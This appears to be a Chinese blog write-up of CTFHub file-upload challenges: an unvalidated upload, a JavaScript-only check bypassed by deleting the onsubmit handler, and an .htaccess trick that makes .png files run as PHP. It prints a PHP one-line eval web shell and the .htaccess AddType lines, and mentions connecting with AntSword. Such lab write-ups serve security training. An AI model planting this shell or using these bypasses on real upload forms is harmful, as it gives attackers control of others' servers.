CTFHUB-技能树-Web题-文件上传(无验证,JS前端验证,前端验证)

python炒粉 2024-08-05 08:03:02 阅读 93

CTFHUB-技能树-Web题-文件上传(无验证,JS前端验证,前端验证—.htaccess)

文章目录

CTFHUB-技能树-Web题-文件上传(无验证,JS前端验证,前端验证—.htaccess)文件上传无验证JS前端验证前端验证—.htaccess题目解析关于如何生成htaccess文件

文件上传

无验证

尝试上传一个php木马文件,1.php

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

上传后显示相对路径,访问此路径,发现可以访问,且木马执行成功

在这里插入图片描述

使用菜刀、蚂剑等工具连接,寻找flag即可

这里使用蚂剑连接

在这里插入图片描述

JS前端验证

提示JS前端验证,我们就需要查看前端代码。

在这里插入图片描述

调出js代码发现,只允许上传pg,png,gif

在这里插入图片描述

将这里得onsubmit触发js删除掉,再进行上传即可

上传一句话php一句话木马

<?php @eval($_POST['pass']);phpinfo();?>

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

访问成功

在这里插入图片描述

利用蚁剑连接,寻找flag

在这里插入图片描述

在html中发现flag

在这里插入图片描述

前端验证—.htaccess

htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能

总结来说就是一种配置文件,里面可以书写一些配置,如将某一文件以某种特定拓展名解析。

题目解析

经查看网页源代码,发现过滤了文件类型。

在这里插入图片描述

根据提示,应上传.htaccess文件

先编写一个.htaccess文件。保存的时候命名直接为.htaccess。

AddType application/x-httpd-php .png

AddType application/x-httpd-php .php

加入“AddType application/x-httpd-php .php”、

“AddType application/x-httpd-php .html”两行,你也可以加入更多,实质就是添加可以执行php的文件类型,比如你再加上一行

“AddType application/x-httpd-php .htm”,则.htm文件也可以执行php程序了,你甚至还可以添加上一行

“AddType application/x-httpd-php .txt”,让普通的文本文件格式也能运行php程序。

在这里插入图片描述

代码段是将png格式文件按php文件进行解析

关于如何生成htaccess文件

选择【文件】》【另存为…】后,弹出的【另存为】对话框,在【文件名】一栏中输入【.htaccess】,【保存类型】选择【所有文件】,然后选择要保存的路径,单击【保存】按钮!

上传htaccess文件

在这里插入图片描述

此时,再上传一句话木马,并把文件改为png格式

在这里插入图片描述

在这里插入图片描述

我们先访问一下,发现代码执行

在这里插入图片描述

最后使用蚁剑连接,寻找flag

在这里插入图片描述

再html中找到flag文件

在这里插入图片描述



声明

本文内容仅代表作者观点,或转载于其他网站,本站不以此文作为商业用途
如有涉及侵权,请联系本站进行删除
转载本站原创文章,请注明来源及作者。